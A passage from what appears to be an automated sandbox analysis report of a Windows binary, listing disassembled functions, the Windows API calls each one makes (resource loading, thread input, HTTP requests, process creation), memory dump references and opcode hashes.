                                    • Instruction Fuzzy Hash: 96C11471608305EFC700DFA4C884A6AB7E9BF89344F05891EF58A9B361DB71ED06CB52
                                    Function 009AACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                    Download Yara Rule
                                    APIs
                                    • __lock.LIBCMT ref: 009AACC1
                                      • Part of subcall function 009A7CF4: __mtinitlocknum.LIBCMT ref: 009A7D06
                                      • Part of subcall function 009A7CF4: RtlEnterCriticalSection.KERNEL32(00000000,?,009A7ADD,0000000D), ref: 009A7D1F
                                    • __calloc_crt.LIBCMT ref: 009AACD2
                                      • Part of subcall function 009A6986: __calloc_impl.LIBCMT ref: 009A6995
                                      • Part of subcall function 009A6986: Sleep.KERNEL32(00000000,000003BC,0099F507,?,0000000E), ref: 009A69AC
                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 009AACED
                                    • GetStartupInfoW.KERNEL32(?,00A36E28,00000064,009A5E91,00A36C70,00000014), ref: 009AAD46
                                    • __calloc_crt.LIBCMT ref: 009AAD91
                                    • GetFileType.KERNEL32(00000001), ref: 009AADD8
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 009AAE11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1426640281-0
                                    • Opcode ID: c6d286b0bf0083eb9949cad65433ceb7496defd83578692ecb1473d1a74c93aa
                                    • Instruction ID: 54d852187717effe293a615b23a00fc96e049628d473e699149c8ee008482c28
                                    • Opcode Fuzzy Hash: c6d286b0bf0083eb9949cad65433ceb7496defd83578692ecb1473d1a74c93aa
                                    • Instruction Fuzzy Hash: 0A81F3719053458FDB24CFA8C8806ADBBF4AF4B320B24465DE4A6AB3D1D7359803CBD6
                                    Function 009C67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __swprintf.LIBCMT ref: 009C67FD
                                    • __swprintf.LIBCMT ref: 009C680A
                                      • Part of subcall function 009A172B: __woutput_l.LIBCMT ref: 009A1784
                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 009C6834
                                    • LoadResource.KERNEL32(?,00000000), ref: 009C6840
                                    • LockResource.KERNEL32(00000000), ref: 009C684D
                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 009C686D
                                    • LoadResource.KERNEL32(?,00000000), ref: 009C687F
                                    • SizeofResource.KERNEL32(?,00000000), ref: 009C688E
                                    • LockResource.KERNEL32(?), ref: 009C689A
                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009C68F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                    • String ID:
                                    • API String ID: 1433390588-0
                                    • Opcode ID: 20aea01246079f11ec5071709dc9f407cec5c4ee9a5b96e2c0632ebdb5e4465e
                                    • Instruction ID: aefe19f826c290228c45f96880119b1e0ee9258f6c72338ca08959f1dbc8c796
                                    • Opcode Fuzzy Hash: 20aea01246079f11ec5071709dc9f407cec5c4ee9a5b96e2c0632ebdb5e4465e
                                    • Instruction Fuzzy Hash: D1316D7690021AABDB11DFA0DD45EBA7BACEF49381F008429F902E2150E774D952DBA1
                                    Function 009C4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 009C4047
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009C30A5,?,00000001), ref: 009C405B
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 009C4062
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009C30A5,?,00000001), ref: 009C4071
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 009C4083
                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009C30A5,?,00000001), ref: 009C409C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009C30A5,?,00000001), ref: 009C40AE
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009C30A5,?,00000001), ref: 009C40F3
                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009C30A5,?,00000001), ref: 009C4108
                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009C30A5,?,00000001), ref: 009C4113
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: 777e070f0052f35ca67a997688d7a7c76c1ef51b689304fda4537d38787ac786
                                    • Instruction ID: a1ffbb18c6b38e02e5d29d659b7e86214d599eaed21913de524ba60b8bc43b89
                                    • Opcode Fuzzy Hash: 777e070f0052f35ca67a997688d7a7c76c1ef51b689304fda4537d38787ac786
                                    • Instruction Fuzzy Hash: 1231D57AA00204AFDB10DFD4DC96F7977BDBBA5311F148009F904E6290DBB6DD868B62
                                    Function 009BCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                    Download Yara Rule
                                    APIs
                                    • EnumChildWindows.USER32(?,009BCF50), ref: 009BCE90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: bb6ca219f625239f6f41f62233d7d7778d1b59f83e715aaa302746889ab5d5ab
                                    • Instruction ID: bf637e60bd0c830d183a0fd2e3278a69c70038737516b698ec7f925dca9453f8
                                    • Opcode Fuzzy Hash: bb6ca219f625239f6f41f62233d7d7778d1b59f83e715aaa302746889ab5d5ab
                                    • Instruction Fuzzy Hash: 6E9174B0A00506EBCB18EF64C582BEAFB75BF44310F548519E499A7291DF30AD59DBE0
                                    Function 00983093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009830DC
                                    • CoUninitialize.OLE32(?,00000000), ref: 00983181
                                    • UnregisterHotKey.USER32(?), ref: 009832A9
                                    • DestroyWindow.USER32(?), ref: 009F5079
                                    • FreeLibrary.KERNEL32(?), ref: 009F50F8
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009F5125
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: a5c53dc81da9ababd21fffb65b3e385baccc18d83e13acb933d1ea9e15e45c0d
                                    • Instruction ID: ba1f0743309508367cb845bf3d85f6d8306cf685ba620a3b682c047b389f62a0
                                    • Opcode Fuzzy Hash: a5c53dc81da9ababd21fffb65b3e385baccc18d83e13acb933d1ea9e15e45c0d
                                    • Instruction Fuzzy Hash: 459128706002068FC715FF64C895B68F3A8BF45B04F5582A9E50AA7262DF30AE66CF50
                                    Function 0099CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 0099CC15
                                      • Part of subcall function 0099CCCD: GetClientRect.USER32(?,?), ref: 0099CCF6
                                      • Part of subcall function 0099CCCD: GetWindowRect.USER32(?,?), ref: 0099CD37
                                      • Part of subcall function 0099CCCD: ScreenToClient.USER32(?,?), ref: 0099CD5F
                                    • GetDC.USER32 ref: 009FD137
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009FD14A
                                    • SelectObject.GDI32(00000000,00000000), ref: 009FD158
                                    • SelectObject.GDI32(00000000,00000000), ref: 009FD16D
                                    • ReleaseDC.USER32(?,00000000), ref: 009FD175
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009FD200
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: fc7445ab49010d429d9c4574c8ae1a7aa85888f329fa27e8b7a55065cc91395f
                                    • Instruction ID: 391d3b282430c7c6b06b9d1e180bedce5b3973970f722678528c14f28f12b17a
                                    • Opcode Fuzzy Hash: fc7445ab49010d429d9c4574c8ae1a7aa85888f329fa27e8b7a55065cc91395f
                                    • Instruction Fuzzy Hash: 2A710274501208DFCF25DFA8CC81ABA7BBAFF88310F184669EE55562A6D7318882DF50
                                    Function 009D45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D45FF
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009D462B
                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009D466D
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009D4682
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D468F
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009D46BF
                                    • InternetCloseHandle.WININET(00000000), ref: 009D4706
                                      • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                    • String ID:
                                    • API String ID: 1241431887-3916222277
                                    • Opcode ID: f641c163ab85018aeaec03c2146b4c6debfb0444e217966b4780881d525ae724
                                    • Instruction ID: e2891cc45df490610b0647c91deaaf8bc300164b8c2479e5b0071297785a4aa5
                                    • Opcode Fuzzy Hash: f641c163ab85018aeaec03c2146b4c6debfb0444e217966b4780881d525ae724
                                    • Instruction Fuzzy Hash: CB416FB2541209BFEB119F90CC89FBB77ACFF09354F008126FA069A281D7B4D9458BA4
                                    Function 009DB644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A1DC00), ref: 009DB715
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A1DC00), ref: 009DB749
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009DB8C1
                                    • SysFreeString.OLEAUT32(?), ref: 009DB8EB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 04e6242384b4af63a5f5ccc16cf802fc7198b695c9d1a0df5cf27eb41d960ea8
                                    • Instruction ID: 8809625c8f6f6b4a5e093478b9ae84f24956dd6b389b60c9db60ae3c75818566
                                    • Opcode Fuzzy Hash: 04e6242384b4af63a5f5ccc16cf802fc7198b695c9d1a0df5cf27eb41d960ea8
                                    • Instruction Fuzzy Hash: E1F13C75A00209EFCF04DF94C894EAEB7B9FF89315F118499F905AB250DB31AE46CB90
                                    Function 009E24D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009E24F5
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009E2688
                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009E26AC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009E26EC
                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009E270E
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009E286F
                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009E28A1
                                    • CloseHandle.KERNEL32(?), ref: 009E28D0
                                    • CloseHandle.KERNEL32(?), ref: 009E2947
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                    • String ID:
                                    • API String ID: 4090791747-0
                                    • Opcode ID: 2cf6141cd0581a8a5069a75890e694501bf8d3fd65f5661dd5cc64a5117a8b4b
                                    • Instruction ID: ac3756fe49dded4a4752c0b0236010fca51c6f6556a1f46eec7fa6de55a5097a
                                    • Opcode Fuzzy Hash: 2cf6141cd0581a8a5069a75890e694501bf8d3fd65f5661dd5cc64a5117a8b4b
                                    • Instruction Fuzzy Hash: F3D1AE31604241DFCB15EF25C891B6ABBE9BF84310F18895DF8999B3A2DB31EC41CB52
                                    Function 009EB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                    Download Yara Rule
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009EB3F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: 3998e43566ce71239e2aae4b10148c91ffbaa94c233aea7bd477bf878380547a
                                    • Instruction ID: b9b9cc20fd86077c64c1ef6099c25b76cf75b42953c50c91d5d7c4bf33946e48
                                    • Opcode Fuzzy Hash: 3998e43566ce71239e2aae4b10148c91ffbaa94c233aea7bd477bf878380547a
                                    • Instruction Fuzzy Hash: 3B51D631601288BFEF229F6ACC86BAF7B68EB45314F244411F614D61E2DB75ED50CB50
                                    Function 0099A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 009FDB1B
                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009FDB3C
                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009FDB51
                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 009FDB6E
                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009FDB95
                                    • DestroyCursor.USER32(00000000), ref: 009FDBA0
                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009FDBBD
                                    • DestroyCursor.USER32(00000000), ref: 009FDBC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                    • String ID:
                                    • API String ID: 3992029641-0
                                    • Opcode ID: 836e6a7e277a9688bdd042eee9c6da47b83e04e519f4b4418100ccc2a060a832
                                    • Instruction ID: d35cf01531ce676905148b5a901e125a71ad0edf54a25ab891188836747e0c8f
                                    • Opcode Fuzzy Hash: 836e6a7e277a9688bdd042eee9c6da47b83e04e519f4b4418100ccc2a060a832
                                    • Instruction Fuzzy Hash: 1A519A34A01208EFDF20DFA8CC82FAA77B9EB58750F110518FA4697290D7B4ED81DB90
                                    Function 009C7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C5FA6,?), ref: 009C6EF1
                                      • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                    • lstrcmpiW.KERNEL32(?,?), ref: 009C75CA
                                    • _wcscmp.LIBCMT ref: 009C75E2
                                    • MoveFileW.KERNEL32(?,?), ref: 009C75FB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                    • String ID:
                                    • API String ID: 793581249-0
                                    • Opcode ID: c9c6d347bd55cf7b6b4604b24cb301381c834178ebc725fad69441335db8e8df
                                    • Instruction ID: 8b6bed637d1e7210133c23daf76770ffd0ec4d68220cd54abaa65ed3801d0296
                                    • Opcode Fuzzy Hash: c9c6d347bd55cf7b6b4604b24cb301381c834178ebc725fad69441335db8e8df
                                    • Instruction Fuzzy Hash: 805110B2E092195ADF50EB94D841EDEB3BCAF49320F0044AEF605E3141EA7496C5CFA5
                                    Function 0099EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 0099EAEB
                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 0099EB32
                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 009FDC86
                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009FDAD1,00000004,00000000,00000000), ref: 009FDCF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 5f0a25f3a5d30ee429900134f8f2011cf730eb20cfea6623b687173854c2020c
                                    • Instruction ID: dfb83b6c3a51122c9e8053d56c24c70ac865d7a39c139a77924bbc41cfa810af
                                    • Opcode Fuzzy Hash: 5f0a25f3a5d30ee429900134f8f2011cf730eb20cfea6623b687173854c2020c
                                    • Instruction Fuzzy Hash: 02411871216284DBDF39CB6E8D8DB3A7A9EBB96305F19080DF28782561D675BC81C321
                                    Function 009BB263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB26C
                                    • RtlAllocateHeap.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB273
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009BAEF1,00000B00,?,?), ref: 009BB288
                                    • GetCurrentProcess.KERNEL32(?,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB290
                                    • DuplicateHandle.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB293
                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,009BAEF1,00000B00,?,?), ref: 009BB2A3
                                    • GetCurrentProcess.KERNEL32(009BAEF1,00000000,?,009BAEF1,00000B00,?,?), ref: 009BB2AB
                                    • DuplicateHandle.KERNEL32(00000000,?,009BAEF1,00000B00,?,?), ref: 009BB2AE
                                    • CreateThread.KERNEL32(00000000,00000000,009BB2D4,00000000,00000000,00000000), ref: 009BB2C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
